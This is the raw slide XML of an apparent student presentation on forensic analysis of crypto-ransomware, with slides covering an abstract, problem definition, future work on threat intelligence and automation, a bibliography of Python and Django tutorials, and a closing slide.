              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> variants and sophisticated evasion tactics.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Furthermore, the incorporation of real-time threat intelligence feeds and external data sources could significantly bolster the system's ability to detect and respond swiftly to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> threats. By continuously monitoring global threat landscapes and analyzing indicators, the system could issue proactive alerts and recommendations, facilitating preemptive actions against potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Automation presents another avenue for future development. By integrating automated workflows and orchestration techniques, the system could initiate containment measures, restore affected systems, and mitigate the impact of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> incidents rapidly and automatically, thereby minimizing downtime and disruption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Moreover, exploring the integration of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>blockchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> technology could enhance the security and integrity of the system's data storage and analysis processes. Leveraging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>blockchain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> for immutable record-keeping and decentralized consensus mechanisms could fortify data integrity, auditability, and resilience against tampering or manipulation attempts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Additionally, integrating the system with cloud-based services could offer scalability, flexibility, and accessibility benefits. By leveraging cloud infrastructure for data storage, processing, and analysis, the system could accommodate increasing data volumes and user demands while ensuring high availability and reliability of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15553207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xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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5" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516147" y="7010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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abstract</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{906DAD8A-A10D-EBC5-D53E-70179F807BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1764836" y="1666193"/>
            <a:ext cx="8659024" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Currently as the widespread use of virtual monetary units (like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bitcoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ethereum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, Ripple, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Litecoin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) has begun, people with bad intentions have been attracted to this area and have produced and marketed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in order to obtain virtual currency easily. This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> infiltrates the victim’s system with smartly-designed methods and encrypts the files found in the system. After the encryption process, the attacker leaves a message demanding a ransom in virtual currency to open access to the encrypted files and warns that otherwise the files will not be accessible. This type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is becoming more popular over time, so currently it is the largest information technology security threat. In the literature, there are many studies about detection and analysis of this cyber-bullying. In this study, we focused on crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and investigated a forensic analysis of a current attack example in detail. In this example, the attack method and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>behavior</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> of the crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> were </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>analyzed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and it was identified that information belonging to the attacker was accessible. With this dimension, we think our study will significantly contribute to the struggle against this threat.</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3003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1557"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bibliography</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1636154"/>
            <a:ext cx="10515600" cy="4847024"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>W3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>School – (https://www.w3schools.com/python/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Geek </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>for Geeks – (https://www.geeksforgeeks.org/python-programming-language/learn-python-tutorial/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Official Documentation – (https://docs.python.org/3/tutorial/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Tutorials </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Point – (https://www.tutorialspoint.com/python/index.htm)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>Python – (https://realpython.com/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Django</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>for Beginners – (https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>djangoforbeginners.com/introduction/)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" smtClean="0"/>
              <a:t>Guru99 – (https://www.guru99.com/django-tutorial.html)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38673489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548" y="2754088"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="11500" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THANK YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="11500" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{1A2A66D5-EEB7-4AD6-AF57-C5C3430B27CE}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26590779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10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="750283" y="1060959"/>
            <a:ext cx="10834991" cy="5443357"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.1 Problem Definition &amp; Description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem specification </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>has emerged as a significant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> threat, encrypting victims' files and demanding ransom for decryption. With the rise of virtual currencies, attackers have found new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ways </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>for exploiting individuals and organizations, making it one of the most prevalent cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>threats. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>This malicious software infiltrates systems through various means and encrypts files, rendering them inaccessible to the victim until a ransom is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>paid. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>The widespread use of virtual currencies complicates efforts to trace transactions, posing challenges in retrieving encrypted files even after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>payment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="3" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Problem description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1828800" lvl="4" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>As cyber attackers evolve their tactics, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> continues to pose a significant challenge to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>cybersecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. Victims are often faced with the dilemma of whether to pay the ransom or risk losing access to critical files. This study aims to contribute to the fight against </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> by conducting a forensic analysis of a recent attack example, shedding light on the attacker's methods and behavior. By understanding the intricacies of crypto-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> attacks, organizations and individuals can better prepare and implement proactive measures to mitigate the risk of such threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2000" dirty="0">
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4" algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 2">
            <a:extLst>
